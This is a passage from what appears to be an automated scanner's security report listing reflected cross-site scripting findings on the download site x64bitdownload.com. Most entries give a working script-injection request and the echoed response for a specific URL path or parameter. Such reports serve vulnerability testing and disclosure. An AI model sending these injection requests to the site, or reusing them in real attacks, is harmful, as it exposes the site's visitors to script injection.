GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html1a5b9"><script>alert(1)</script>2ee9fead789" />
...[SNIP]...

4.1691. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69348"><script>alert(1)</script>081516f460c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-multimedia-design-downloads-258-0-d.html?69348"><script>alert(1)</script>081516f460c=1" />
...[SNIP]...

4.1692. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 343da"><script>alert(1)</script>afffd569a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories343da"><script>alert(1)</script>afffd569a53/free-64-bit-network-internet-downloads-10-0-d.html" />
...[SNIP]...

4.1693. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53512"><script>alert(1)</script>5772985df31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html53512"><script>alert(1)</script>5772985df31" />
...[SNIP]...

4.1694. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6798"><script>alert(1)</script>34b8fd1d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-network-internet-downloads-10-0-d.html?f6798"><script>alert(1)</script>34b8fd1d87=1" />
...[SNIP]...

4.1695. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35c"><script>alert(1)</script>7c5db426e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories4e35c"><script>alert(1)</script>7c5db426e5d/free-64-bit-security-privacy-downloads-11-0-d.html" />
...[SNIP]...

4.1696. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6ea"><script>alert(1)</script>ea41a27d65e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html1b6ea"><script>alert(1)</script>ea41a27d65e" />
...[SNIP]...

4.1697. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1e9"><script>alert(1)</script>3697cb785d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-security-privacy-downloads-11-0-d.html?5e1e9"><script>alert(1)</script>3697cb785d8=1" />
...[SNIP]...

4.1698. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021b"><script>alert(1)</script>390428112e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:37:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7021b"><script>alert(1)</script>390428112e3/free-64-bit-servers-downloads-12-0-d.html" />
...[SNIP]...

4.1699. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 203dc"><script>alert(1)</script>8b744dfd2ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79904


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html203dc"><script>alert(1)</script>8b744dfd2ce" />
...[SNIP]...

4.1700. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410cf"><script>alert(1)</script>001936dc891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-servers-downloads-12-0-d.html?410cf"><script>alert(1)</script>001936dc891=1" />
...[SNIP]...

4.1701. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff48"><script>alert(1)</script>712b29e0247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescff48"><script>alert(1)</script>712b29e0247/free-64-bit-system-utilities-downloads-13-0-d.html" />
...[SNIP]...

4.1702. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88d4"><script>alert(1)</script>bde65231c50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.htmla88d4"><script>alert(1)</script>bde65231c50" />
...[SNIP]...

4.1703. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a91"><script>alert(1)</script>06180f2151b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-system-utilities-downloads-13-0-d.html?d0a91"><script>alert(1)</script>06180f2151b=1" />
...[SNIP]...

4.1704. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1be"><script>alert(1)</script>1593af6f4d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories9a1be"><script>alert(1)</script>1593af6f4d8/free-64-bit-web-development-downloads-14-0-d.html" />
...[SNIP]...

4.1705. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca45"><script>alert(1)</script>88a1d2dd8e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-web-development-downloads-14-0-d.htmlbca45"><script>alert(1)</script>88a1d2dd8e0" />
...[SNIP]...

4.1706. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80afd"><script>alert(1)</script>c425ef0f66e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html?80afd"><script>alert(1)</script>c425ef0f66e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:14 GMT
Cache-Control: max-age=600
Pragma: cache
